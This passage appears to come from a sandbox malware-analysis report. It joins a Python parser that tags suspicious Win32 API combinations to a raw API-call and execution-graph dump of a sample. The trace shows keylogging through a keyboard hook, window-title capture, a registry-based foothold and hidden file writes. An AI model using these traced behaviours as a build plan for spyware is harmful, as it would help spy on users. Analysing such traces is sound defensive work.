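• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B89562), ref: 02B89500
Strings
Memory Dump Source
• Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
APIs
  • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
  • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
  • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
  • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
  • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B98216), ref: 02B981F8
Strings
Similarity
• API ID: HandleModule$AddressProc$CacheFlushInstruction
• String ID: FlushInstructionCache$Kernel32
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AD98
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02B9ADC8
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02B9ADE7
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9ADF3
Similarity
• API ID: Read$Write
• String ID:
"""

# One bullet under "APIs": optional "Part of subcall function X:", then
# Name.MODULE(args) for Win32 calls or Name.LIBRARY for CRT helpers, then "ref: <addr>".
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
# "• API ID: ..." and "• String ID: ..." under "Similarity" ("API String ID" is deliberately not matched).
ID_RE = re.compile(r"•\s*(API ID|String ID):\s*(.*)")


@dataclass
class Call:
    name: str
    module: str
    ref: str
    args: Optional[str]
    via_subcall: Optional[str]  # address of the subcall function, if the call was reached through one


@dataclass
class Entry:
    calls: List[Call] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""


def parse_entries(text: str) -> List[Entry]:
    """Split the dump into entries; each one starts at an 'APIs' header line."""
    entries: List[Entry] = []
    current: Optional[Entry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Entry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.search(line)
        if m:
            current.calls.append(Call(m["name"], m["module"], m["ref"], m["args"], m["sub"]))
            continue
        m = ID_RE.match(line)
        if m:
            if m.group(1) == "API ID":
                current.api_id = m.group(2).strip()
            else:
                current.string_id = m.group(2).strip()
    return entries


# Groupings are this example's assumptions, not Joe Sandbox signature definitions.
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
PROBES = {"IsBadReadPtr", "IsBadWritePtr", "IsBadCodePtr", "IsBadStringPtrA"}


def flag(entry: Entry) -> Set[str]:
    """Tag an entry by the API combinations it (including its direct subcalls) uses."""
    names = {c.name for c in entry.calls}
    tags: Set[str] = set()
    if "GetProcAddress" in names and names & LOADERS:
        tags.add("runtime_import_resolution")  # imports looked up by name at run time
    if "FlushInstructionCache" in names:
        tags.add("code_modified_in_memory")    # an I-cache flush only matters after code bytes were written
    if names & PROBES:
        tags.add("pointer_probing")            # IsBad*Ptr used to test memory rather than trust a pointer
    return tags


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.api_id or "(no API ID)", sorted(flag(e)), [c.name for c in e.calls])
```

The "Part of subcall function" bullets are kept in the same entry on purpose: Joe Sandbox lists them because the resolver and the flush are one unit of behaviour even though they sit in different functions, and tagging only direct calls would miss the GetProcAddress half of the pattern.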

                                                              Execution Graph

                                                               Execution Coverage: 4%
                                                               Dynamic/Decrypted Code Coverage: 0%
                                                               Signature Coverage: 4.6%
                                                               Total number of Nodes: 1574
                                                               Total number of Limit Nodes: 62
                                                               execution_graph (rendered graph; the dump is a flat stream of "<node id> <address> [label]" and "<src>-><dst>" tokens, reproduced here only as the nodes whose label names resolved calls, in order of appearance; the remaining nodes carry only "N API calls" counts or CRT helper names)
                                                               • 30d3672: RtlAllocateHeap
                                                               • 30c27ae: IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter (___scrt_fastfail)
                                                               • 30c29da: IsProcessorFeaturePresent
                                                               • 30d15bf: IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess
                                                               • 30c28dc: GetStartupInfoW
                                                               • 30aa8da: LoadLibraryA GetProcAddress
                                                               • 309d660: CreateMutexA GetLastError
                                                               • 309d5fc: OpenMutexA
                                                               • 309d67f: GetModuleFileNameW
                                                               • 30a1f34: RegOpenKeyExA
                                                               • 309d60f: WaitForSingleObject CloseHandle
                                                               • 309e501: CreateProcessA CloseHandle CloseHandle (___scrt_fastfail)
                                                               • 30a20e8: RegOpenKeyExA
                                                               • 30a1eea: RegOpenKeyExA RegQueryValueExA RegCloseKey
                                                               • 30a215f: RegCreateKeyA
                                                               • 309da70: CreateThread
                                                               • 309db6c: CreateThread
                                                               • 309dbbd: CreateThread
                                                               • 30a95f8: GetComputerNameExW GetUserNameW
                                                               • 309dcc1: SetProcessDEPPolicy
                                                               • 309dcc4: CreateThread
                                                               • 309dcd9: CreateThread
                                                               • 309dcee: CreateThread
                                                               • 309dc39: CreateThread
                                                               • 30c2d56: IsProcessorFeaturePresent
                                                               • 30c2d5c: SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess
                                                               • 30aa919: LoadLibraryA GetProcAddress
                                                               • 30aa909: GetModuleHandleA GetProcAddress
                                                               • 30aa947: GetModuleHandleA GetProcAddress
                                                               • 30aa937: GetModuleHandleA GetProcAddress
                                                               • 30aa95f: GetModuleHandleA GetProcAddress
                                                               • 30a9493: FindResourceA
46017 3091fc1 46016->46017 46017->45695 46019 3091fa9 46018->46019 46020 3091fb2 46018->46020 46452 30925c0 28 API calls 46019->46452 46020->45700 46453 30a9f23 46022->46453 46027 3091fc2 28 API calls 46028 30a92ea 46027->46028 46029 3091fb8 11 API calls 46028->46029 46030 30a92f2 46029->46030 46031 30a1f91 31 API calls 46030->46031 46033 30a9348 46030->46033 46032 30a931b 46031->46032 46034 30a9326 StrToIntA 46032->46034 46033->45728 46035 30a933d 46034->46035 46036 30a9334 46034->46036 46038 3091fb8 11 API calls 46035->46038 46461 30aaccf 22 API calls 46036->46461 46038->46033 46040 30a2356 46039->46040 46041 30962ee 28 API calls 46040->46041 46042 30a236b 46041->46042 46043 30920d6 28 API calls 46042->46043 46044 30a237b 46043->46044 46045 30a215f 14 API calls 46044->46045 46046 30a2385 46045->46046 46047 3091fb8 11 API calls 46046->46047 46048 30a2392 46047->46048 46048->45831 46050 309207b 46049->46050 46051 30923ae 11 API calls 46050->46051 46052 3092086 46051->46052 46462 30924cd 46052->46462 46056 30a21af 46055->46056 46058 30a2178 46055->46058 46057 3091fb8 11 API calls 46056->46057 46059 309da38 46057->46059 46060 30a218a RegSetValueExA RegCloseKey 46058->46060 46059->45781 46060->46056 46062 30c9880 _strftime 46061->46062 46466 30c8bbe 46062->46466 46064 309da51 46064->45788 46064->45791 46066 30a958b 46065->46066 46067 30a94f0 GetLocalTime 46065->46067 46069 3091fb8 11 API calls 46066->46069 46068 30952fe 28 API calls 46067->46068 46070 30a9532 46068->46070 46071 30a9593 46069->46071 46072 3098209 28 API calls 46070->46072 46073 3091fb8 11 API calls 46071->46073 46074 30a953e 46072->46074 46075 309daa1 46073->46075 46494 3092ef0 46074->46494 46075->45807 46078 3098209 28 API calls 46079 30a9556 46078->46079 46499 30a928b 76 API calls 46079->46499 46081 30a9564 46082 3091fb8 11 API calls 46081->46082 46083 30a9570 46082->46083 46084 3091fb8 11 API calls 46083->46084 46085 30a9579 46084->46085 46086 3091fb8 11 API calls 46085->46086 46087 30a9582 
46086->46087 46088 3091fb8 11 API calls 46087->46088 46088->46066 46503 3091f66 46089->46503 46091 3098f36 _wcslen 46092 3098f49 46091->46092 46093 3098f60 46091->46093 46094 309c5ed 31 API calls 46092->46094 46095 309c5ed 31 API calls 46093->46095 46096 3098f51 46094->46096 46097 3098f68 46095->46097 46098 3091ef3 28 API calls 46096->46098 46099 3091ef3 28 API calls 46097->46099 46100 3098f5b 46098->46100 46101 3098f76 46099->46101 46104 3091ee9 11 API calls 46100->46104 46102 3091ee9 11 API calls 46101->46102 46103 3098f7e 46102->46103 46535 30981c7 28 API calls 46103->46535 46106 3098fb5 46104->46106 46108 3098ffb 46106->46108 46109 3098fdc 46106->46109 46107 3098f90 46536 3092ff4 46107->46536 46507 3098098 46108->46507 46112 3098fe1 46109->46112 46113 3099013 46109->46113 46117 3098098 28 API calls 46112->46117 46116 3091ee9 11 API calls 46113->46116 46121 309901b 46116->46121 46118 3098fef 46117->46118 46541 30992ba 29 API calls 46118->46541 46119 3091ef3 28 API calls 46123 3098fa5 46119->46123 46121->45849 46125 3091ee9 11 API calls 46123->46125 46124 3098ff9 46124->46113 46125->46100 46726 309415e 46126->46726 46131 3092ff4 28 API calls 46132 30a965d 46131->46132 46133 3091ee9 11 API calls 46132->46133 46134 30a9666 46133->46134 46135 3091ee9 11 API calls 46134->46135 46136 309dca2 46135->46136 46137 3091ef3 46136->46137 46138 3091f02 46137->46138 46145 3091f4a 46137->46145 46139 3092232 11 API calls 46138->46139 46140 3091f0b 46139->46140 46141 3091f4d 46140->46141 46143 3091f26 46140->46143 46142 3092316 11 API calls 46141->46142 46142->46145 46819 309303c 28 API calls 46143->46819 46146 3091ee9 46145->46146 46147 3092232 11 API calls 46146->46147 46148 3091ef2 46147->46148 46148->45894 46148->45895 46820 309533f 46149->46820 46151 30952eb 46152 3092035 11 API calls 46151->46152 46153 30952fa 46152->46153 46153->45754 46155 30920bf 11 API calls 46154->46155 46156 30a3994 46155->46156 46839 30a9894 46156->46839 46159 30920bf 11 API calls 46160 30a39aa 
46159->46160 46161 3091e45 28 API calls 46160->46161 46162 30a39b8 46161->46162 46163 30c9867 _strftime 39 API calls 46162->46163 46164 30a39c5 46163->46164 46165 30a39ca Sleep 46164->46165 46166 30a39d7 46164->46166 46165->46166 46167 3092073 28 API calls 46166->46167 46168 30a39e6 46167->46168 46169 3091e45 28 API calls 46168->46169 46170 30a39ef 46169->46170 46171 30920d6 28 API calls 46170->46171 46172 30a39fa 46171->46172 46173 30a9d87 28 API calls 46172->46173 46174 30a3a02 46173->46174 46175 3091e45 28 API calls 46174->46175 46176 30a3a15 46175->46176 46177 3091e45 28 API calls 46176->46177 46185 30a3a94 46176->46185 46178 30a3a2e 46177->46178 46179 3091e45 28 API calls 46178->46179 46180 30a3a3f 46179->46180 46183 3091e45 28 API calls 46180->46183 46181 30a9d87 28 API calls 46181->46185 46182 3091e45 28 API calls 46182->46185 46184 30a3a50 46183->46184 46186 3091e45 28 API calls 46184->46186 46185->46181 46185->46182 46187 309822a 28 API calls 46185->46187 46189 3091fc2 28 API calls 46185->46189 46192 3091fb8 11 API calls 46185->46192 46196 30a94da 79 API calls 46185->46196 46198 30a3be2 WSAGetLastError 46185->46198 46200 30952dd 28 API calls 46185->46200 46204 30952fe 28 API calls 46185->46204 46205 3091e6d 11 API calls 46185->46205 46207 30a44a7 46185->46207 46212 3098098 28 API calls 46185->46212 46213 30cf34f 20 API calls 46185->46213 46214 30920d6 28 API calls 46185->46214 46215 30a20e8 3 API calls 46185->46215 46216 30a1f91 31 API calls 46185->46216 46217 309415e 28 API calls 46185->46217 46218 3091e45 28 API calls 46185->46218 46222 30a9b16 28 API calls 46185->46222 46225 30a9c8a 28 API calls 46185->46225 46227 3092e81 28 API calls 46185->46227 46228 3098209 28 API calls 46185->46228 46230 3092ef0 28 API calls 46185->46230 46232 3091ee9 11 API calls 46185->46232 46234 30a4423 46185->46234 46236 3092073 28 API calls 46185->46236 46237 30a4461 CreateThread 46185->46237 46843 30a393f 46185->46843 46849 3094f31 46185->46849 46861 30948a8 46185->46861 
46920 30a97c1 46185->46920 46923 30a3013 46185->46923 46926 30a9ac6 46185->46926 46928 30a9a77 46185->46928 46933 309e2bb GetLocaleInfoA 46185->46933 46936 3092f11 28 API calls 46185->46936 46937 309826c 28 API calls 46185->46937 46938 3094a81 58 API calls _Yarn 46185->46938 46939 3094bf0 46185->46939 46960 3094e06 87 API calls 46185->46960 46188 30a3a61 46186->46188 46187->46185 46190 3091e45 28 API calls 46188->46190 46189->46185 46191 30a3a72 46190->46191 46193 3091e45 28 API calls 46191->46193 46192->46185 46194 30a3a84 46193->46194 46957 309471d 88 API calls 46194->46957 46196->46185 46958 30aa86b 30 API calls 46198->46958 46200->46185 46204->46185 46205->46185 46206 3091e45 28 API calls 46206->46207 46207->46206 46208 30c9867 _strftime 39 API calls 46207->46208 46209 30a44bf Sleep 46208->46209 46209->46185 46212->46185 46213->46185 46214->46185 46215->46185 46216->46185 46217->46185 46219 30a3e7b GetTickCount 46218->46219 46220 30a9b16 28 API calls 46219->46220 46220->46185 46222->46185 46225->46185 46227->46185 46228->46185 46230->46185 46232->46185 46959 3099f9a 84 API calls 46234->46959 46236->46185 46237->46185 46238->45674 46239->45682 46240->45686 46243 30920bf 11 API calls 46242->46243 46244 3098236 46243->46244 46245 3093280 28 API calls 46244->46245 46246 3098253 46245->46246 46246->45708 46248 309d5c5 46247->46248 46249 30a1f5e RegQueryValueExA RegCloseKey 46247->46249 46248->45704 46248->45729 46249->46248 46250->45712 46251->45731 46252->45759 46253->45731 46254->45741 46256 3091f66 11 API calls 46255->46256 46257 309c609 46256->46257 46258 309c629 46257->46258 46259 309c65e 46257->46259 46261 309c61f 46257->46261 47013 30a959f 29 API calls 46258->47013 46262 30a9f23 GetCurrentProcess 46259->46262 46260 309c752 GetLongPathNameW 46264 309415e 28 API calls 46260->46264 46261->46260 46265 309c663 46262->46265 46267 309c767 46264->46267 46268 309c6b9 46265->46268 46269 309c667 46265->46269 46266 309c632 46270 3091ef3 28 API calls 46266->46270 46271 
309415e 28 API calls 46267->46271 46272 309415e 28 API calls 46268->46272 46273 309415e 28 API calls 46269->46273 46274 309c63c 46270->46274 46275 309c776 46271->46275 46276 309c6c7 46272->46276 46277 309c675 46273->46277 46279 3091ee9 11 API calls 46274->46279 47016 309c7f9 28 API calls 46275->47016 46282 309415e 28 API calls 46276->46282 46283 309415e 28 API calls 46277->46283 46279->46261 46280 309c789 47017 3092f85 28 API calls 46280->47017 46285 309c6dd 46282->46285 46286 309c68b 46283->46286 46284 309c794 47018 3092f85 28 API calls 46284->47018 47015 3092f85 28 API calls 46285->47015 47014 3092f85 28 API calls 46286->47014 46290 309c79e 46293 3091ee9 11 API calls 46290->46293 46291 309c6e8 46294 3091ef3 28 API calls 46291->46294 46292 309c696 46295 3091ef3 28 API calls 46292->46295 46296 309c7a8 46293->46296 46297 309c6f3 46294->46297 46298 309c6a1 46295->46298 46300 3091ee9 11 API calls 46296->46300 46301 3091ee9 11 API calls 46297->46301 46299 3091ee9 11 API calls 46298->46299 46303 309c6aa 46299->46303 46304 309c7b1 46300->46304 46302 309c6fc 46301->46302 46305 3091ee9 11 API calls 46302->46305 46306 3091ee9 11 API calls 46303->46306 46307 3091ee9 11 API calls 46304->46307 46305->46274 46306->46274 46308 309c7ba 46307->46308 46309 3091ee9 11 API calls 46308->46309 46310 309c7c3 46309->46310 46311 3091ee9 11 API calls 46310->46311 46312 309c7cc 46311->46312 46312->45821 46313->45832 46314->45846 46315->45850 46317 30a210e RegQueryValueExA RegCloseKey 46316->46317 46318 30a2132 46316->46318 46317->46318 46318->45760 46319->45796 46324 30c22a4 46320->46324 46321 30c9adb new 21 API calls 46321->46324 46322 309db53 46322->45858 46324->46321 46324->46322 47019 30d0480 7 API calls 2 library calls 46324->47019 47020 30c29bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46324->47020 47021 30c301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46324->47021 46327->45888 46328->45876 46329->45735 46332 30a94b0 
LoadResource LockResource SizeofResource 46331->46332 46333 309dd9e 46331->46333 46332->46333 46333->45941 46335 309209f 46334->46335 46343 30923ae 46335->46343 46337 30920aa 46347 30924ea 46337->46347 46339 30920b9 46339->45945 46341 3092097 28 API calls 46340->46341 46342 3096302 46341->46342 46342->45952 46344 3092408 46343->46344 46345 30923b8 46343->46345 46344->46337 46345->46344 46354 3092787 11 API calls std::_Deallocate 46345->46354 46348 30924fa 46347->46348 46349 3092515 46348->46349 46350 3092500 46348->46350 46365 30928c8 46349->46365 46355 3092549 46350->46355 46353 3092513 46353->46339 46354->46344 46376 3092868 46355->46376 46357 309255d 46358 3092572 46357->46358 46359 3092587 46357->46359 46381 3092a14 22 API calls 46358->46381 46361 30928c8 28 API calls 46359->46361 46364 3092585 46361->46364 46362 309257b 46382 30929ba 22 API calls 46362->46382 46364->46353 46366 30928d1 46365->46366 46367 30928db 46366->46367 46368 3092933 46366->46368 46371 30928e4 46367->46371 46372 30928f7 46367->46372 46390 3092884 22 API calls 46368->46390 46384 3092c8e 46371->46384 46374 30928f5 46372->46374 46375 30923ae 11 API calls 46372->46375 46374->46353 46375->46374 46378 3092870 46376->46378 46377 3092878 46377->46357 46378->46377 46383 3092c83 22 API calls 46378->46383 46381->46362 46382->46364 46385 3092c98 __EH_prolog 46384->46385 46391 3092e34 22 API calls 46385->46391 46387 30923ae 11 API calls 46389 3092d72 46387->46389 46388 3092d04 46388->46387 46389->46374 46391->46388 46393 30920c7 46392->46393 46394 30923ae 11 API calls 46393->46394 46395 30920d2 46394->46395 46395->45961 46401 309421a 46396->46401 46399->45961 46400->45980 46402 3094223 46401->46402 46403 30923ae 11 API calls 46402->46403 46404 309422e 46403->46404 46405 3092549 28 API calls 46404->46405 46406 3094195 46405->46406 46406->45961 46407->45984 46408->45988 46409->45990 46410->45995 46413 309328a 46411->46413 46412 30932a9 46412->46000 46413->46412 46414 30928c8 28 API calls 46413->46414 
46414->46412 46416 30951db 46415->46416 46425 3095254 46416->46425 46418 30951e8 46418->46003 46420 3092041 46419->46420 46421 30923ae 11 API calls 46420->46421 46422 309205b 46421->46422 46447 309265a 46422->46447 46426 3095262 46425->46426 46427 3095268 46426->46427 46428 309527e 46426->46428 46436 30925d0 46427->46436 46430 30952d5 46428->46430 46431 3095296 46428->46431 46445 3092884 22 API calls 46430->46445 46434 30928c8 28 API calls 46431->46434 46435 309527c 46431->46435 46434->46435 46435->46418 46437 3092868 22 API calls 46436->46437 46438 30925e2 46437->46438 46439 3092609 46438->46439 46440 3092652 46438->46440 46443 30928c8 28 API calls 46439->46443 46444 309261b 46439->46444 46446 3092884 22 API calls 46440->46446 46443->46444 46444->46435 46448 309266b 46447->46448 46449 30923ae 11 API calls 46448->46449 46450 309206d 46449->46450 46450->46006 46451->46014 46452->46020 46454 30a9f30 GetCurrentProcess 46453->46454 46455 30a92bc 46453->46455 46454->46455 46456 30a1f91 RegOpenKeyExA 46455->46456 46457 30a1fbf RegQueryValueExA RegCloseKey 46456->46457 46458 30a1fe9 46456->46458 46457->46458 46459 3092073 28 API calls 46458->46459 46460 30a1ffe 46459->46460 46460->46027 46461->46035 46463 30924d9 46462->46463 46464 30924ea 28 API calls 46463->46464 46465 3092091 46464->46465 46465->45776 46482 30c97c5 46466->46482 46468 30c8c0b 46488 30c8557 35 API calls 2 library calls 46468->46488 46470 30c8be5 46487 30cad91 20 API calls _free 46470->46487 46471 30c8bd0 46471->46468 46471->46470 46481 30c8bea pre_c_initialization 46471->46481 46474 30c8c17 46476 30c8c46 46474->46476 46489 30c980a 39 API calls __Toupper 46474->46489 46478 30c8cb2 46476->46478 46490 30c9771 20 API calls 2 library calls 46476->46490 46491 30c9771 20 API calls 2 library calls 46478->46491 46479 30c8d79 _strftime 46479->46481 46492 30cad91 20 API calls _free 46479->46492 46481->46064 46483 30c97dd 46482->46483 46484 30c97ca 46482->46484 46483->46471 46493 30cad91 20 API calls _free 
46484->46493 46486 30c97cf pre_c_initialization 46486->46471 46487->46481 46488->46474 46489->46474 46490->46478 46491->46479 46492->46481 46493->46486 46500 3091f90 46494->46500 46496 3092efe 46497 3092035 11 API calls 46496->46497 46498 3092f0d 46497->46498 46498->46078 46499->46081 46501 30925d0 28 API calls 46500->46501 46502 3091f9d 46501->46502 46502->46496 46504 3091f6e 46503->46504 46542 3092232 46504->46542 46506 3091f79 46506->46091 46508 30980ae 46507->46508 46509 3092232 11 API calls 46508->46509 46510 30980c8 46509->46510 46547 3094247 46510->46547 46512 30980d6 46513 3099203 46512->46513 46560 309a83c 46513->46560 46516 309922f 46519 3092073 28 API calls 46516->46519 46517 3099257 46518 3092073 28 API calls 46517->46518 46520 3099262 46518->46520 46521 3099239 46519->46521 46522 3092073 28 API calls 46520->46522 46564 30a9bca 28 API calls 46521->46564 46524 3099271 46522->46524 46526 30a94da 79 API calls 46524->46526 46525 3099247 46565 309a0b0 31 API calls new 46525->46565 46528 3099276 CreateThread 46526->46528 46531 309929d CreateThread 46528->46531 46532 3099291 CreateThread 46528->46532 46573 3099305 46528->46573 46529 309924e 46530 3091fb8 11 API calls 46529->46530 46530->46517 46533 3091ee9 11 API calls 46531->46533 46570 3099311 46531->46570 46532->46531 46567 30992ef 46532->46567 46534 30992b1 46533->46534 46534->46113 46535->46107 46697 3093202 46536->46697 46538 3093002 46701 3093242 46538->46701 46541->46124 46725 30992fb 159 API calls 46541->46725 46543 309228c 46542->46543 46544 309223c 46542->46544 46543->46506 46544->46543 46546 3092759 11 API calls std::_Deallocate 46544->46546 46546->46543 46548 3092868 22 API calls 46547->46548 46549 309425b 46548->46549 46550 3094270 46549->46550 46551 3094285 46549->46551 46557 30942bf 22 API calls 46550->46557 46559 30927c6 28 API calls 46551->46559 46554 3094279 46558 3092c28 22 API calls 46554->46558 46556 3094283 46556->46512 46557->46554 46558->46556 46559->46556 46561 3099221 46560->46561 
46562 309a845 46560->46562 46561->46516 46561->46517 46566 309a8bc 28 API calls 46562->46566 46564->46525 46565->46529 46566->46561 46576 3099340 46567->46576 46605 3099c1f 46570->46605 46650 309971e 46573->46650 46577 3099359 GetModuleHandleA SetWindowsHookExA 46576->46577 46578 30993bb GetMessageA 46576->46578 46577->46578 46580 3099375 GetLastError 46577->46580 46579 30993cd TranslateMessage DispatchMessageA 46578->46579 46581 30992f8 46578->46581 46579->46578 46579->46581 46591 30a9b16 46580->46591 46584 30952dd 28 API calls 46585 3099396 46584->46585 46586 3092073 28 API calls 46585->46586 46587 30993a5 46586->46587 46588 30a94da 79 API calls 46587->46588 46589 30993aa 46588->46589 46590 3091fb8 11 API calls 46589->46590 46590->46581 46596 30cf34f 46591->46596 46594 3092073 28 API calls 46595 3099386 46594->46595 46595->46584 46597 30cf35b 46596->46597 46600 30cf14b 46597->46600 46599 30a9b3a 46599->46594 46601 30cf162 46600->46601 46603 30cf199 pre_c_initialization 46601->46603 46604 30cad91 20 API calls _free 46601->46604 46603->46599 46604->46603 46612 3099c2d 46605->46612 46606 3099c87 Sleep GetForegroundWindow GetWindowTextLengthW 46635 309a854 46606->46635 46607 309931a 46610 3091f66 11 API calls 46610->46612 46612->46606 46612->46607 46612->46610 46614 30a9ac6 GetTickCount 46612->46614 46615 3099ccd GetWindowTextW 46612->46615 46617 3099e25 46612->46617 46618 309a83c 28 API calls 46612->46618 46620 3099d92 Sleep 46612->46620 46621 30cf34f 20 API calls 46612->46621 46623 3092073 28 API calls 46612->46623 46625 30952dd 28 API calls 46612->46625 46627 3092ff4 28 API calls 46612->46627 46628 3098209 28 API calls 46612->46628 46630 3099d1a 46612->46630 46632 3091ee9 11 API calls 46612->46632 46633 309962e 12 API calls 46612->46633 46634 3091fb8 11 API calls 46612->46634 46641 30c219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46612->46641 46642 30c2525 23 API calls __onexit 46612->46642 46643 
30c215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 46612->46643 46644 3098080 28 API calls 46612->46644 46646 309a8cc 28 API calls 46612->46646 46647 309a694 40 API calls 2 library calls 46612->46647 46648 30a9bca 28 API calls 46612->46648 46614->46612 46615->46612 46619 3091ee9 11 API calls 46617->46619 46618->46612 46619->46607 46620->46612 46621->46612 46623->46612 46625->46612 46626 3098098 28 API calls 46626->46630 46627->46612 46628->46612 46630->46612 46630->46626 46645 309a0b0 31 API calls new 46630->46645 46632->46612 46633->46612 46634->46612 46636 309a85c 46635->46636 46637 3092232 11 API calls 46636->46637 46638 309a867 46637->46638 46649 309a87c 28 API calls 46638->46649 46640 309a876 46640->46612 46642->46612 46643->46612 46644->46612 46645->46630 46646->46612 46647->46612 46648->46612 46649->46640 46651 3099733 Sleep 46650->46651 46671 309966d 46651->46671 46653 309930e 46654 3099773 CreateDirectoryW 46659 3099745 46654->46659 46655 3099784 GetFileAttributesW 46655->46659 46656 309979b SetFileAttributesW 46656->46659 46657 30920bf 11 API calls 46669 30997e6 46657->46669 46659->46651 46659->46653 46659->46654 46659->46655 46659->46656 46661 3091e45 28 API calls 46659->46661 46659->46669 46684 30aa17b 46659->46684 46660 3099815 PathFileExistsW 46660->46669 46661->46659 46663 3092097 28 API calls 46663->46669 46664 309991e SetFileAttributesW 46664->46659 46665 3091fb8 11 API calls 46665->46669 46666 30962ee 28 API calls 46666->46669 46667 3091fc2 28 API calls 46667->46669 46669->46657 46669->46660 46669->46663 46669->46664 46669->46665 46669->46666 46669->46667 46670 3091fb8 11 API calls 46669->46670 46694 30aa20f 32 API calls 46669->46694 46695 30aa27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 46669->46695 46670->46659 46672 309971a 46671->46672 46674 3099683 46671->46674 46672->46659 46673 30996a2 CreateFileW 46673->46674 46675 30996b0 GetFileSize 46673->46675 46674->46673 46676 30996e5 
CloseHandle 46674->46676 46677 30996f7 46674->46677 46678 30996da Sleep 46674->46678 46679 30996d3 46674->46679 46675->46674 46675->46676 46676->46674 46677->46672 46681 3098098 28 API calls 46677->46681 46678->46676 46696 309a025 83 API calls 46679->46696 46682 3099713 46681->46682 46683 3099203 123 API calls 46682->46683 46683->46672 46685 30aa18e CreateFileW 46684->46685 46687 30aa1cb 46685->46687 46688 30aa1c7 46685->46688 46689 30aa1eb WriteFile 46687->46689 46690 30aa1d2 SetFilePointer 46687->46690 46688->46659 46692 30aa1fe 46689->46692 46693 30aa200 CloseHandle 46689->46693 46690->46689 46691 30aa1e2 CloseHandle 46690->46691 46691->46688 46692->46693 46693->46688 46694->46669 46695->46669 46696->46678 46698 309320e 46697->46698 46707 30935f8 46698->46707 46700 309321b 46700->46538 46702 309324e 46701->46702 46703 3092232 11 API calls 46702->46703 46704 3093268 46703->46704 46721 3092316 46704->46721 46708 3093606 46707->46708 46709 309360c 46708->46709 46710 3093624 46708->46710 46718 3093686 28 API calls 46709->46718 46712 309363c 46710->46712 46713 309367e 46710->46713 46717 3093622 46712->46717 46719 30927c6 28 API calls 46712->46719 46720 3092884 22 API calls 46713->46720 46717->46700 46718->46717 46719->46717 46722 3092327 46721->46722 46723 3092232 11 API calls 46722->46723 46724 30923a7 46723->46724 46724->46119 46727 3094166 46726->46727 46728 3092232 11 API calls 46727->46728 46729 3094171 46728->46729 46737 309419c 46729->46737 46732 30942dc 46749 3094333 46732->46749 46734 30942ea 46735 3093242 11 API calls 46734->46735 46736 30942f9 46735->46736 46736->46131 46738 30941a8 46737->46738 46741 30941b9 46738->46741 46740 309417c 46740->46732 46742 30941c9 46741->46742 46743 30941cf 46742->46743 46744 30941e6 46742->46744 46746 3094247 28 API calls 46743->46746 46748 30927c6 28 API calls 46744->46748 46747 30941e4 46746->46747 46747->46740 46748->46747 46750 309433f 46749->46750 46753 3094351 46750->46753 46752 309434d 46752->46734 46754 309435f 
46753->46754 46755 309437e 46754->46755 46756 3094365 46754->46756 46757 3092868 22 API calls 46755->46757 46816 30934c6 28 API calls 46756->46816 46758 3094386 46757->46758 46760 30943f9 46758->46760 46761 309439f 46758->46761 46818 3092884 22 API calls 46760->46818 46772 309437c 46761->46772 46817 30927c6 28 API calls 46761->46817 46772->46752 46816->46772 46817->46772 46819->46145 46821 309534b 46820->46821 46824 3095362 46821->46824 46823 3095359 46823->46151 46825 3095370 46824->46825 46826 309538d 46825->46826 46827 3095376 46825->46827 46828 3092868 22 API calls 46826->46828 46837 3093830 28 API calls 46827->46837 46829 3095395 46828->46829 46831 30953ae 46829->46831 46832 3095407 46829->46832 46834 30928c8 28 API calls 46831->46834 46836 309538b 46831->46836 46838 3092884 22 API calls 46832->46838 46834->46836 46836->46823 46837->46836 46840 30a98da _Yarn ___scrt_fastfail 46839->46840 46841 3092073 28 API calls 46840->46841 46842 30a399f 46841->46842 46842->46159 46844 30a3958 WSASetLastError 46843->46844 46845 30a394e 46843->46845 46844->46185 46961 30a37dc 29 API calls ___std_exception_copy 46845->46961 46847 30a3953 46847->46844 46850 3094f4e 46849->46850 46851 3094f45 46849->46851 46850->46185 46851->46850 46852 30a9b16 28 API calls 46851->46852 46853 3094f71 46852->46853 46854 30952dd 28 API calls 46853->46854 46855 3094f81 46854->46855 46856 3092073 28 API calls 46855->46856 46857 3094f90 46856->46857 46858 30a94da 79 API calls 46857->46858 46859 